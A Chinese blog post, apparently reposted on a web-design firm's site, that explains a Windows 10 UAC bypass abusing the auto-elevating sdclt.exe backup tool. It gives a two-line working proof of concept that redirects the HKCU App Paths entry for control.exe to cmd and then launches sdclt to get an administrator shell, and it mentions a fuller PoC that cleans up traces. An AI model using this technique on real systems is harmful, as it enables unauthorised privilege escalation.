如何利用sdclt磁盘备份工具绕过UAC

简介

创新互联是专业的白山网站建设公司，白山接单;提供网站建设、成都网站建设,网页设计,网站设计,建网站,PHP网站建设等专业做网站服务;采用PHP框架,可快速的进行白山网站开发网页制作和功能扩展;专业做搜索引擎喜爱的网站,专业的做网站团队,希望更多企业前来合作!

sdclt 是微软提供的命令行磁盘备份工具，从 Vista 时代引入

在 Windows 10 开始，sdclt 加入了自动提升权限的能力，requestedExecutionLevel 由 asInvoker 变为 requireAdministrator

(命令 sigcheck -m %systemroot%\system32\sdclt.exe 的结果)

当不带任何参数启动 sdclt 时，sdclt 会打开控制面板

控制面板的主程序为 control.exe，那么 sdclt 是如何找到 control.exe 完整路径的呢?

通过 process monitor 的分析 (过滤掉不相干进程，再用 CTRL + F 搜索 control.exe)，sdclt 似乎是从注册表读取到了 control.exe 的路径，

按照这个原理，我们写一个简单的 PoC 测试下

 
 
 
 

  
  
  
  
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f 
  
  
  
  
sdclt 
 
 
 
 

在 cmd 中执行一下试试

可以看到，控制面板没有启动，而是弹出了一个 cmd，我们也获得了管理员权限

当然，提升权限后还要清理下痕迹，具体代码请看完整PoC，点这里下载

写在***

其实可以把 HKCU 整个导出来看一下，目前我还没有发现其它类似的案例，有兴趣的同学可以研究下~

文章名称：如何利用sdclt磁盘备份工具绕过UAC
网页网址：http://www.gawzjz.com/qtweb/news31/166581.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联